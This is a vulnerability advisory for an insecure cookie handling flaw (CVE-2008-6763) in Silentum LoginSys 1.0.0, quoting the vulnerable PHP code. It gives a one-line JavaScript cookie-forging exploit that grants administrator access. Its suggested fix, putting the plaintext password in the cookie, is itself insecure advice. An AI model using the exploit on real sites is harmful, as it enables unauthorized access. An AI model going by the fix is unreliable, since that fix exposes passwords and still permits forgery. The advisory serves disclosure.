Silentum LoginSys 1.0.0 Insecure Cookie Handling vulnerability

2009-04-29 / 2009-04-30
Credit: Osirys
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6763
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[START] #################################################################################################################### [0x01] Informations: Script : Silentum LoginSys 1.0.0 Download : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1 Vulnerability : Insecure Cookie Handling Author : Osirys Contact : osirys[at]live[dot]it Website : http://osirys.org Notes : Proud to be Italian Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX #################################################################################################################### [0x02] Bug: [Insecure Cookie Handling] ###### Bugged file is: /[path]/login2.php [CODE] else { setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/"); header("Location: index.php"); exit; } [/CODE] If we log in correctly, a cookie is set with name "logged_in" and as content the username name. [!] FIX: Set as content username's password. [CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE] [!] EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/"; *admin_username is the nick of the administrator #################################################################################################################### [/END]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top